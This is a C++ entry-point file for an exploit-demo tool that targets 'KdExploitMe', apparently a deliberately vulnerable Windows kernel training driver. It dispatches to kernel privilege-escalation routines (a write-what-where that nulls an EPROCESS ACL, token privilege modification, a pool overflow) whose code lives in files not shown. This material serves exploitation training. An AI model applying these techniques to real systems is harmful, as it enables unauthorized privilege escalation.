ExploitDemos.cpp
#pragma once
#include "stdafx.h"
#include "GenericAttacks.h"
#include "PoolOverflow.h"
#include "KernelAddressLeak.h"
#include <string>
using namespace std;
/// Prints the command-line usage text for ExploitDemos to stdout.
///
/// The text names the invocation form and the three demo selectors
/// (-01, -02, -03) with the KdExploitMe driver method each one exercises.
void PrintHelpMenu()
{
    // One entry per output line; every entry already ends in its newline.
    static const char* const kHelpLines[] = {
        "ExploitDemos Help:\n",
        "Demonstrates exploiting the KdExploitMe driver.\n",
        "--------------\n",
        "ExploitDemos.exe -ExploitNumber\n",
        " -01 : Demo METHOD_WRITEWHATWHERE - NULL EPROCESS ACL.\n",
        " -02 : Demo METHOD_DECADDRESS - Modify token privileges.\n",
        " -03 : Demo METHOD_OVERFLOWPOOL - 0xbad0b0b0, Non-Paged Pool, 64bit only.\n",
    };

    // Emit through "%s" so the table text is never interpreted as a format string.
    for (const char* helpLine : kHelpLines)
    {
        printf("%s", helpLine);
    }
}
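/// Entry point: picks one KdExploitMe demo by number and runs it against the
/// driver's device object.
///
/// Usage: ExploitDemos.exe -NN (PrintHelpMenu lists the selectors).
///
/// @param argc  Must be exactly 2: the program name plus one selector.
/// @param argv  argv[1] is the selector. Its first character is skipped and the
///              rest is parsed as a decimal number.
/// @return -1 when the argument count is wrong or the selector cannot be parsed;
///         0 otherwise. A failed CreateFile also returns 0, as the original did.
int _tmain(int argc, _TCHAR* argv[])
{
    if (argc != 2)
    {
        PrintHelpMenu();
        return -1;
    }

    // Validate the selector before prompting or opening the device, so bad input
    // never reaches the driver. An empty argument must be rejected first:
    // argv[1] + 1 would point past its terminator.
    if (argv[1][0] == 0)
    {
        PrintHelpMenu();
        return -1;
    }

    int exploitNumber = 0;
    try
    {
        exploitNumber = stoi(argv[1] + 1);
    }
    catch (...)
    {
        // stoi throws std::invalid_argument / std::out_of_range on bad input.
        // Uncaught, that would terminate the process instead of showing usage.
        PrintHelpMenu();
        return -1;
    }

    // Pause until the user types a token and presses enter.
    // NOTE(review): presumably this leaves time to attach a debugger - confirm.
    // The original initialized this string from NULL, which is undefined
    // behavior (std::string built from a null pointer).
    string dummy;
    printf("Press any key and hit enter to continue...\n");
    cin >> dummy;

    //
    // open the device
    //
    // NOTE(review): CREATE_ALWAYS is kept from the original. OPEN_EXISTING is the
    // usual disposition for device objects - confirm the driver does not depend
    // on it before changing.
    HANDLE hDevice = CreateFile(L"\\\\.\\KdExploitMe",
                                GENERIC_READ | GENERIC_WRITE,
                                0,
                                NULL,
                                CREATE_ALWAYS,
                                FILE_ATTRIBUTE_NORMAL,
                                NULL);
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        DWORD errNum = GetLastError();
        printf("- CreateFile failed! Error code = 0x%x\n", errNum);
        // Exit code 0 on failure is preserved so existing callers see no change.
        return 0;
    }

    switch (exploitNumber)
    {
    case 1:
        AttackWriteWhatWhere(hDevice);
        break;
    case 2:
        AttackDecAddress(hDevice);
        break;
    case 3:
        AttackPO_BAD0B0B0(hDevice);
        break;
    default:
        // Parsed as a number, but not one of the documented demos.
        PrintHelpMenu();
        break;
    }

    //
    // close the handle to the device.
    //
    CloseHandle(hDevice);
    return 0;
}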